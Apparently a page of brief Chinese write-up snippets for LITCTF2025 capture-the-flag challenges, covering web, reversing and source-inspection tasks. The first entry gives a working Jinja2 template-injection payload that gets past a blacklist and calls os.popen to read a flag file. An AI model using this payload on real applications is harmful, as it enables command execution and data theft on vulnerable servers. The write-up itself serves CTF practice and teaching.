Litctf

LITCTF2025 Web 星愿信箱 经过测试是SSTI，可以通过设置变量绕过黑名单 {% set os = (lipsum | attr('__globals__')) | attr('get')('os') %} {% set popen = os | attr('popen') %} {% set input_cmd = "head /flag" %} {% set cmd = popen(input_cmd).read() %} {% print cmd %} nest_js 弱密码，登录就有flag ...

世界上最棒的程序员 Shift+F12，在全局字符串中查找到flag ez_XOR 使用32位IDA打开，F5查看伪代码 可以看到存在字符串输入后进行异或，异或是可逆性的 ...

我flag呢？ 进去之后页面是这样 先看看网页源码呢 在注释里拿到flag 源码里也有一段彩蛋 导弹迷踪 进去之后好像是一个小游戏 先审查一下源码 在最下面看到Game files ...